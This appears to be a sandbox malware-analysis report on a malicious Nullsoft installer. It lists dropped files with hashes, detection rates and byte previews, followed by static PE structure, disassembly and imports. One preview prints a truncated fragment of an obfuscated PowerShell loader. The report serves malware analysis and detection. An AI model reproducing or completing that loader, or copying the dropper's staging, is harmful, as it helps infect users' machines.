                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):706493
                                                                                                                                                                                    Entropy (8bit):7.805950633156626
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:IfL/Ufibu6BWJWE2DeMQ3Tj1tYZl4Tzzo27tKlQyYefZKSxA340ryKhz:IfL8fibu6BWMDU427tjexKj3v
                                                                                                                                                                                    MD5:21F092B643089F4C05D3257430075A65
                                                                                                                                                                                    SHA1:E54525E972627916BAC452001CD2F5A5E75C650D
                                                                                                                                                                                    SHA-256:A86C116C881FC184302B73C91A25E0BF0A8952971815891DEF98B50FF3C7E7D1
                                                                                                                                                                                    SHA-512:C808A0F5D2393C98B37C0C60E99355714489C38A2126C461B10BFF1687D1747042237BEA26140C0A171CC916A750EE9681C4867E7D6D41B86C40FCD736025EC1
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................@...k...........................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....k...@...l..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Autocueing.exe:Zone.Identifier

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv1c1mgc.y3u.psm1

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qa0rj3a0.k5x.ps1

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txr0y5dd.sun.psm1

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vt2yyrly.vuu.ps1

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):7168
                                                                                                                                                                                    Entropy (8bit):5.2959870663251625
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                                                                                                                                                                    MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                                                                                                                                                                    SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                                                                                                                                                                    SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                                                                                                                                                                    SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                    • Filename: 7uY105UTJU.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: iwEnYIOol8.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: 678763_PDF.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Shipping documents 000022999878999800009999.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Ze1Ueabtx5.img, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                    C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (4199), with CRLF, LF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):71111
                                                                                                                                                                                    Entropy (8bit):5.191239155448104
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:POS0+fOX1QPVwmhXek0nf+ov91o0ygqi/zckAz1Om/Dw:POS0Ms1QV4f+o9LZcnw
                                                                                                                                                                                    MD5:86CFEA49F8B2A1A68CC0EFE3C7F4662F
                                                                                                                                                                                    SHA1:1E4791D2195DE246665B17502311A125291BF90D
                                                                                                                                                                                    SHA-256:3E180565B0183374C01761CE59258A1C764DD325B10CB4803D04E00FAAAD2DB0
                                                                                                                                                                                    SHA-512:7C2009838BDD441B2660DA4D7AA356FAA823D1FE82806C876654C89DC3C451F17FF319F7684AC10E2A1904C5EC719138FB797AB2993E3511230A86C0EDC5DD65
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Preview:$Revsende236=$Uslebent;.....<#Outweep squawk Bandoleret Littlenecks Frantss Theoriser #>..<#Midwinters Separableness Aluminiumskassen Varmefylders #>..<#Curstful Losnings Pomposities Bushidos Trllemrkets Gomart #>..<#Recondense Countersignature Associating Rotls #>..<#Papirmasses Wormseeds Brutage Ordners Alberths Ujvnheden #>..<#Syrebestandige Rationaliserendes Predetermining #>...$Eftersgnings = @'.Sevrdig.Hyperka$ eenudvFDemokralMot rkre SyrientOpium.asGpadsuboUddannerOpmuntrt No abseG ainfirNonfeloiFo finenHopscotgCarpetweAnn,ttprVintrei=Sadd.lm$TekkkenLAdvoke,aSk.ubhvcAffr.rneUdp.mper ecoheraFertilebsuperbel BolbroeCiv lis;Indsejl.Skal trf FikseruBlkhat nSuperfec onderot Lissabi Pa,teloTran pinEfterbe SpkkenaLAnoge.iuLitho.okScenemenBrummeniFul maanphrasergsejerne Orthogr(D.valua$BesindiSFer eaaiSnothvas,irantis klvniniun,tageeUnattensAmts,aat enstr,B eflow$QualiateCertifinAfholdst.imodtar joenstaDodgingiSluggarnNomad.csNy teprr ErichsoSpewingnHjemmeszPolypa eHyrekrsfFlanereaAfb

                                                                                                                                                                                    C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\preappearance.glu

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):408232
                                                                                                                                                                                    Entropy (8bit):1.259531155482668
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:c3mYm00dVSgDT+afxNr3DwNJbiI7MrrtHFmYA3vCiuv/BQanrlhqkroqqL7jCzHs:X00FVwDotSeUpjvxXDpih4YZtc
                                                                                                                                                                                    MD5:CCE82C77E237537520FBD52B63A51E58
                                                                                                                                                                                    SHA1:D902CE813446431FFECA35141FCD9825D4DBEF4D
                                                                                                                                                                                    SHA-256:0F7DCA6879E497104B6813228391DECF7D6270D90FC887F1B9384B5E5B438221
                                                                                                                                                                                    SHA-512:2F0C0A6FBA09D19D72828589A658FEECD9E0A03F2B8C3DCA046AACFCB887375D538452D59DB24EDB8D17199AC3CA43ED1373262B6206B30F55F00ED159BAFEFE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:.......................................................................................P................0......................................................(.....................................................................................S.............................r..-.................n...................]....................................|e................`......................{.................................J....................*......J............................]..................................................u..............................................................................................................\........................:...............................................................M..........................................................................................................................l..............l....8...........9............................................................2....=.........................................

                                                                                                                                                                                    C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\reaktiv.ove

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 55
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):379198
                                                                                                                                                                                    Entropy (8bit):1.2531245811733491
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:K2a+g7Qqek5bnEKRY3dJkKoYZrcvYy5oXBfwokPtW:TrvqLJnudnttcvARYtW
                                                                                                                                                                                    MD5:B4BD98AA231F431FA2C0B32C041971DA
                                                                                                                                                                                    SHA1:D58868B02A5DEDACC33CE7EB0658201EF5A29766
                                                                                                                                                                                    SHA-256:E34CA004CCB16A80E49010B584428A08AB3D89FCA778567346D26F84FF892962
                                                                                                                                                                                    SHA-512:69CD7AF495A1DC3F612B456A2ABB2FE9F6FF556E73DA0707B26325E08AA94138FB094DAA4A35E7C7BCDCE81FDF118A9A4C664632523CEED16765B2E74FCBDD05
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:........7....................................................$................................................n.........b...............S...............................................~%..........................................................................K................................................._....w.......*e.......b.'.....M.......].....................................................[.......................................................................u...G.............G.....................................F!.......................w...................................................................................r.....................................................F................>.s.....................................2......E..............g............................................................C.>...............A.........................................................................................................................S..........................

                                                                                                                                                                                    C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\storfavoritters.tid

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):495136
                                                                                                                                                                                    Entropy (8bit):1.2514913232658866
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:jfLDH9Jx2uiEaWIwEfM+5EUPDohS/uF1bXyCOAqRu:TsIaV+CDTuF1bizAT
                                                                                                                                                                                    MD5:F28B6FB0CA8AF14D2913C43CBEA08754
                                                                                                                                                                                    SHA1:0BA129FCFA0131A4EFCDF2B1952F4FAE59604720
                                                                                                                                                                                    SHA-256:F1C35573809F92DC65D2EB2EBC3CD9D0C78E75E73ED741E52BAECAE2FC02DD70
                                                                                                                                                                                    SHA-512:523F6E0A8E879F13AB9D7BAE0E7A7E0157ABB0A8B1240F0EC0B5FF84C26A3F1519535DFAD9170BC6E887AE70DE03B939148D629695DB71DC53DF5A75AC2E2757
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:...n.............................Y.....................!.......j.........[...............R................+.........M............................................................=..........................................................j....g.......9..........................&....................................s.......................x.......{............-............................................V......................u......................................................................................F.........y..................V.............\.......................`....................]..........e.......1.........6.......M................+...................................S...e..............................................g..........................Z.....26............C...&...............................................-...................................................................)..................................................................................G......

                                                                                                                                                                                    C:\Users\user\AppData\Roaming\erstatningsgraden\Redefineredes213.Sub

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):301869
                                                                                                                                                                                    Entropy (8bit):7.694643941781828
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:iHXVPdSH6j0MBXnqMXt9pLZhs6T7xzQykNWvqU1C72Utl:MSH6jgMXt9pLZFT0WSU1C7xP
                                                                                                                                                                                    MD5:43775D590E4A73A56364CACF70BF6EFB
                                                                                                                                                                                    SHA1:64D823C615ABE114733D308A97F66DFAF71D2DF4
                                                                                                                                                                                    SHA-256:EF8704EF858A6679B15D2C660D7E142A54027DFDC439005EB47D1054100979B8
                                                                                                                                                                                    SHA-512:12325BF458D4036C894169237B4A08D75450BF9007F119C8B29E0761C965F7CF4918D230DD86CD70983757EA63363A2E5FCD602FC75F90E30F7B1CCAFC8AAC79
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:......................W.ooo....O..((........Z....................uuuuuuuuuuu............b............!...............;;;......................................***..}...........................JJJ.........Z..~~................,......X........@.9......W.}}}...A."...........yyy...........................d.z.......GG.......KK..```........._....zz..........nnnn.\\.mm......TT..........=.......ssss......... ....==............................&.....rrr.....[[....7._..............gg.....................................sss..................NN.."..........}........Q.......................?............E..... ......}}......}..&...........J...%%%.LL..TT.uu.jj....................[............]].......|..........rr..GG...................I...uuu..))..........PPP...............0.................O.....g........(..................]]].C.............^.............................UU................vv..........y.P.'....2222...-....................(.........."..................U.......^...c.dddd...........%..2.

                                                                                                                                                                                    Static File Info

                                                                                                                                                                                    General

                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                    Entropy (8bit):7.805950633156626
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:av8XPPpdBc.exe
                                                                                                                                                                                    File size:706'493 bytes
                                                                                                                                                                                    MD5:21f092b643089f4c05d3257430075a65
                                                                                                                                                                                    SHA1:e54525e972627916bac452001cd2f5a5e75c650d
                                                                                                                                                                                    SHA256:a86c116c881fc184302b73c91a25e0bf0a8952971815891def98b50ff3c7e7d1
                                                                                                                                                                                    SHA512:c808a0f5d2393c98b37c0c60e99355714489c38a2126c461b10bff1687d1747042237bea26140c0a171cc916a750ee9681c4867e7d6d41b86c40fcd736025ec1
                                                                                                                                                                                    SSDEEP:12288:IfL/Ufibu6BWJWE2DeMQ3Tj1tYZl4Tzzo27tKlQyYefZKSxA340ryKhz:IfL8fibu6BWMDU427tjexKj3v
                                                                                                                                                                                    TLSH:C9E412C43D9194A2EAB17873F87B1C6017932D1726DA235F537433B929A3252A35FA0F
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

                                                                                                                                                                                    File Icon

                                                                                                                                                                                    Icon Hash:539b8caeaee66c11

                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                    General

                                                                                                                                                                                    Entrypoint:0x403532
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                    Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                    Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                    Instruction
                                                                                                                                                                                    sub esp, 000003F8h
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    push esi
                                                                                                                                                                                    push edi
                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                    pop edi
                                                                                                                                                                                    xor ebp, ebp
                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                    mov dword ptr [esp+20h], ebp
                                                                                                                                                                                    mov dword ptr [esp+18h], 0040A2D8h
                                                                                                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                                                                                                    call dword ptr [004080A4h]
                                                                                                                                                                                    mov esi, dword ptr [004080A8h]
                                                                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                                                                    push eax
                                                                                                                                                                                    mov dword ptr [esp+4Ch], ebp
                                                                                                                                                                                    mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                                                    mov dword ptr [esp+00000150h], ebp
                                                                                                                                                                                    mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                                                    call esi
                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                    jne 00007F90E8EACA1Ah
                                                                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                                                                    mov dword ptr [esp+34h], 00000114h
                                                                                                                                                                                    push eax
                                                                                                                                                                                    call esi
                                                                                                                                                                                    mov ax, word ptr [esp+48h]
                                                                                                                                                                                    mov ecx, dword ptr [esp+62h]
                                                                                                                                                                                    sub ax, 00000053h
                                                                                                                                                                                    add ecx, FFFFFFD0h
                                                                                                                                                                                    neg ax
                                                                                                                                                                                    sbb eax, eax
                                                                                                                                                                                    mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                                                    not eax
                                                                                                                                                                                    and eax, ecx
                                                                                                                                                                                    mov word ptr [esp+00000148h], ax
                                                                                                                                                                                    cmp dword ptr [esp+38h], 0Ah
                                                                                                                                                                                    jnc 00007F90E8EAC9E8h
                                                                                                                                                                                    and word ptr [esp+42h], 0000h
                                                                                                                                                                                    mov eax, dword ptr [esp+40h]
                                                                                                                                                                                    movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                                                                    mov dword ptr [004347B8h], eax
                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                    mov ah, byte ptr [esp+38h]
                                                                                                                                                                                    movzx eax, ax
                                                                                                                                                                                    or eax, ecx
                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                    mov ch, byte ptr [esp+00000148h]
                                                                                                                                                                                    movzx ecx, cx
                                                                                                                                                                                    shl eax, 10h
                                                                                                                                                                                    or eax, ecx
                                                                                                                                                                                    movzx ecx, byte ptr [esp+0000004Eh]

                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                    Data Directories

                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x16bf0.rsrc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                    Sections

                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                    .text0x10000x68d80x6a00742185983fa6320c910f81782213e56fFalse0.6695165094339622data6.478461709868021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .rdata0x80000x14640x1600a995b118b38426885fc6ccaa984c8b7aFalse0.4314630681818182data4.969091535632612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .data0xa0000x2a8180x6009a9bf385a30f1656fc362172b16d9268False0.5247395833333334data4.172601271908501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .ndata0x350000x1f0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .rsrc0x540000x16bf00x16c004361f60a54e8593e396ed02385fb8e51False0.43695269574175827data5.337867037994319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                    Resources

                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                    RT_ICON0x543280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3725452502070271
                                                                                                                                                                                    RT_ICON0x64b500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5725103734439834
                                                                                                                                                                                    RT_ICON0x670f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.676829268292683
                                                                                                                                                                                    RT_ICON0x681a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6172707889125799
                                                                                                                                                                                    RT_ICON0x690480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7436823104693141
                                                                                                                                                                                    RT_ICON0x698f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5361271676300579
                                                                                                                                                                                    RT_ICON0x69e580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.849290780141844
                                                                                                                                                                                    RT_DIALOG0x6a2c00x100dataEnglishUnited States0.5234375
                                                                                                                                                                                    RT_DIALOG0x6a3c00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                    RT_DIALOG0x6a4e00xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                    RT_DIALOG0x6a5a80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                    RT_GROUP_ICON0x6a6080x68dataEnglishUnited States0.7211538461538461
                                                                                                                                                                                    RT_VERSION0x6a6700x240dataEnglishUnited States0.5364583333333334
                                                                                                                                                                                    RT_MANIFEST0x6a8b00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                                                                    Imports

                                                                                                                                                                                    DLLImport
                                                                                                                                                                                    ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
